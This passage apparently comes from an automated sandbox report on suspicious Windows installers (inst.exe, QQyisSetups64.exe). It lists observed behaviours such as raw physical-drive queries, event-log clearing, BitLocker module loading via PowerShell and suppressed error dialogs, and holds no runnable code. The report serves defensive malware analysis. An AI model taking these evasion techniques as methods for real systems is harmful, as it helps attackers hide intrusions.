                          Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d15_2_00AE1A51
                          Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d15_2_00AE1BEB
                          Source: C:\Users\user\Downloads\inst.exeCode function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d15_2_00AE2158
                          Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d15_2_00AF2210
                          Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d15_2_00AF25D0
                          Source: C:\Users\user\Downloads\inst.exeCode function: _malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d15_2_00A766F0
                          Source: C:\Users\user\Downloads\inst.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,_malloc,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d15_2_00AF2760
                          Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d15_2_00A76759
                          Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d15_2_00A868A0
                          Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d15_2_00A86AE0
                          Source: C:\Users\user\Downloads\inst.exeCode function: RegQueryValueExW,_malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d15_2_6C5D42E0
                          Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d15_2_6C5D4349
                          Source: C:\Users\user\Downloads\inst.exeCode function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d16_2_00AE2158
                          Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d16_2_00AF2210
                          Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d16_2_00AF25D0
                          Source: C:\Users\user\Downloads\inst.exeCode function: SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d16_2_00A766F0
                          Source: C:\Users\user\Downloads\inst.exeCode function: DeviceIoControl,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d16_2_00AF2760
                          Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d16_2_00A76759
                          Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d16_2_00A868A0
                          Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d16_2_00A86AE0
                          Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d16_2_00AE18BD
                          Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d16_2_00AE1A51
                          Source: C:\Users\user\Downloads\inst.exeCode function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d16_2_00AE1BEB

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00AA5C31 IsWindow,IsIconic,ShowWindow,ShowWindow,IsWindowVisible,ShowWindow,SetForegroundWindow,SetWindowPos,SetWindowPos,SetWindowPos,15_2_00AA5C31
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00ACA4F6 __EH_prolog3,IsIconic,ShowWindow,15_2_00ACA4F6
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00AA6727 FindWindowW,ShowWindow,IsWindowVisible,IsIconic,BringWindowToTop,15_2_00AA6727
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C618D76 __EH_prolog3,IsWindow,IsIconic,SelectClipRgn,OffsetClipRgn,GdipDeleteGraphics,SelectClipRgn,DeleteObject,15_2_6C618D76
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00AA6727 FindWindowW,ShowWindow,IsWindowVisible,IsIconic,BringWindowToTop,16_2_00AA6727
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00AA5C31 IsWindow,IsIconic,ShowWindow,ShowWindow,IsWindowVisible,ShowWindow,SetForegroundWindow,SetWindowPos,SetWindowPos,SetWindowPos,16_2_00AA5C31
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0378B3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog,6_2_0378B3C0
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00A95706 __EH_prolog3,_memset,GetWindowsDirectoryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,15_2_00A95706
                          Source: C:\Users\user\Downloads\inst.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\LiveUpdate360Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeKey value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4Jump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
